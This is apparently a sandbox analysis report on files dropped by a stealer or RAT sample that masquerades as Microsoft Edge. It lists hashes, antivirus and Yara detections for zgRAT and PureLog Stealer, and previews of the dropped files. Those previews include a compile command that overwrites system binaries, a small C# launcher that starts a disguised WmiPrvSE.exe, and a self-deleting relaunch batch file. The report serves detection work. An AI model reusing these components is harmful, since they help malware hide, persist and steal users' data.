                                                                                                                                                                      SHA-512:8CD837530200792481A0C9080E668E9147A923C33C379C71D0EB5726146031A6CB538BDE7F28E160FA92CB275F80165C5C39DBD014E2904F9CEEC64D50125A68
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):404
                                                                                                                                                                      Entropy (8bit):4.991107941089428
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLy4BiFkD:JNVQIbSfhWLzIiFkMSfh+9FkD
                                                                                                                                                                      MD5:8FE4593F65A012E6AEC712C9A21AFD05
                                                                                                                                                                      SHA1:9C17699A7ABB1915A5334F8BA0A080C5003C4D5D
                                                                                                                                                                      SHA-256:FD0F1500FC825DF812F5BC8EA9C04707C36F7C178B6A78ECF8F39A459F7A0C1E
                                                                                                                                                                      SHA-512:70D0B192A1220E64587E6C0CB6618EC8ED868D7F63E7379934C4AC93B39606965F34714DA47A41394A68980AAB22486F15AF6F20AC1BD0AB4D9944BDB2F54DFA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\WmiPrvSE.exe"); } catch { } }).Start();. }.}.
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                      Entropy (8bit):5.112613765972802
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oCHhJ23f5GAn:Hu7L//TRRzscQDcA
                                                                                                                                                                      MD5:B90FCF62254E1A1BB99DCE93A83912E7
                                                                                                                                                                      SHA1:9AD1A03B7625A11526FBD863A602BC6524F657A7
                                                                                                                                                                      SHA-256:98F6681CF54469A177680726B8890664E5A7B7361283EE4469565FF172275F69
                                                                                                                                                                      SHA-512:375C06D7741BB83F53FCA4D102A87B8901DFD6E5C9AB21355B958672E8DF820B3A1DD5D4B217B83B2CC6BE9737601D29671602E87CA3DCC9AFC5CC65713205B2
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.0.cs"
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (330), with CRLF, CR line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):751
                                                                                                                                                                      Entropy (8bit):5.249906825801337
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:apI/u7L//TRRzscQDc1KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/VRzstDOKax5DqBVKVrdFAMBJj
                                                                                                                                                                      MD5:E434632CBFA9E5704944349B40D8369F
                                                                                                                                                                      SHA1:2EA5E08005FB772DCC65D14559B16EA98D57CA7D
                                                                                                                                                                      SHA-256:3BD741126909776E95CA863BDD5420EB5BB11207EFDBB4D578155376E1F29371
                                                                                                                                                                      SHA-512:F8146E6175155E164896C469C23AF05EF5DF135AD28F13C5D0899F00EE9AFD95F394960FA42BEBAC52AEDD9E1FABF8346D8752A7CF67559ABFBE932A42CC6687
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):147
                                                                                                                                                                      Entropy (8bit):5.117031081547063
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mF5XIvBktKcKZG1CHyg4E2J5xAIESdzK:hCRLuVFOOr+DE74vKOZG1CHhJ23flJK
                                                                                                                                                                      MD5:41ACE4647E5B3D7E06F691561CBC742E
                                                                                                                                                                      SHA1:2C86A9A3B2B83025D0E8EE649984137899329114
                                                                                                                                                                      SHA-256:C07ECC7F853655212E4FD0E355F97D55B8D3E5135B437DF43F9F687F3201BD43
                                                                                                                                                                      SHA-512:F5D292306652858D461DC4BD1F59CF5C63EE8E81FF9716BBBBF73CBBFB083B0000B62C8F16F8AEAFECD0EE7C1664E3E458B5EF8D538AF4F390D1162F6BE9E477
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Edge\msedge.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\qgs8WdcQ4J.bat"
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1963008
                                                                                                                                                                      Entropy (8bit):7.552676792704024
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
                                                                                                                                                                      MD5:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                      SHA1:864A1DA1AF2E7B5049B8E7A93402D2BDED518681
                                                                                                                                                                      SHA-256:1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
                                                                                                                                                                      SHA-512:56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\WmiPrvSE.exe, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\WmiPrvSE.exe, Author: Joe Security
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)...*...8I...(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):69632
                                                                                                                                                                      Entropy (8bit):5.932541123129161
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                      • Filename: 0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: e416c0d0e2c49f0d5582d90727781330a012ebe541a60.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: p3f932IsTO.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: UpU2O6YQxG.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: 5WbBcHi91R.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: 4LU843t3Vt.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: ggJWCFp2S3.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: yQrCGtNgsf.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: qDlkXj5kcZ.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: C0laqZmkEf.exe, Detection: malicious, Browse
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):32256
                                                                                                                                                                      Entropy (8bit):5.631194486392901
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):69632
                                                                                                                                                                      Entropy (8bit):5.932541123129161
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):32256
                                                                                                                                                                      Entropy (8bit):5.631194486392901
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):85504
                                                                                                                                                                      Entropy (8bit):5.8769270258874755
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):85504
                                                                                                                                                                      Entropy (8bit):5.8769270258874755
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):23552
                                                                                                                                                                      Entropy (8bit):5.519109060441589
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                                      MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                                      SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                                      SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                                      SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):23552
                                                                                                                                                                      Entropy (8bit):5.519109060441589
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                                      MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                                      SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                                      SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                                      SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                      Entropy (8bit):5.645950918301459
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                      MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                      SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                      SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                      SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                      Entropy (8bit):5.645950918301459
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                      MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                      SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                      SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                      SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\curl.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2284739
                                                                                                                                                                      Entropy (8bit):7.490456730492454
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:2TbBv5rUyXVRCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKY:IBJ1LLvax4Gmhscse1D
                                                                                                                                                                      MD5:C85ABE0E8C3C4D4C5044AEF6422B8218
                                                                                                                                                                      SHA1:F9A4DACEBF1DD80F54DA8C8AFE1DEDDAC99D381D
                                                                                                                                                                      SHA-256:7C388F4215D04EEA63A7D5BD9F3CADE715F285EA72DE0E43192FC9F34BAF7C52
                                                                                                                                                                      SHA-512:082F4924C624D9B35DFF185B582278E032D3FF230E48739D796BBA250B0807C498EF1B52F78B864AADB35DB0F65463035110C02B7D92DE4FB0A86902CCAD7CB5
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 68%
